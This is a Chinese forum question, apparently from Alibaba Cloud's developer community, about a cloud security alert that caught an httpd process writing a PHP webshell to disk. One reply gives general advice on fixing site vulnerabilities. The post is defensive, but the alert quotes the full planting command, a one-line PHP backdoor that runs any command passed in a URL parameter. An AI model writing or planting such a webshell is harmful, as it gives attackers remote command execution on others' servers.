被webshell攻击了
这些我已近配置了,现在看到如下内容:(怎么解决!!!)
待处理确认线下处理忽略本次标记为误报
父进程名称:httpd 进程名称:bash 进程路径:/usr/bin/bash
进程id:18,146 命令行参数:sh -c echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php
事件说明:云盾检测到当成有异常进程在尝试向磁盘上写入WEBSHELL后门文件,导致2次入侵,如果该行为不是您主动执行,请及时删除对应文件。 解决方案:请及时排查WWW目录下是否存在WEBSHELL,并及时清除。
展开
收起
2
条回答
写回答
写回答
-
喜欢智慧创造的过程网站被黑客攻击经常反复篡改上传webshell后门脚本木马,说明你的网站存在很多安全隐患,以及网站漏洞,就算登录服务器找到源文件修复了,也会被黑客再次入侵,只有把网站的所有漏洞找出来,一一进行修复,防止黑客的攻击,避免安全事故发生,如果您对网站漏洞修复不熟悉的话,建议找专业的网站安全公司帮您修复网站漏洞,国内也就Sinesafe和绿盟、启明星辰等安全公司比较专业.2018-12-27 08:51:17赞同 1 展开评论 打赏 -
版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
相关问答
问答排行榜
最热
最新
推荐问答
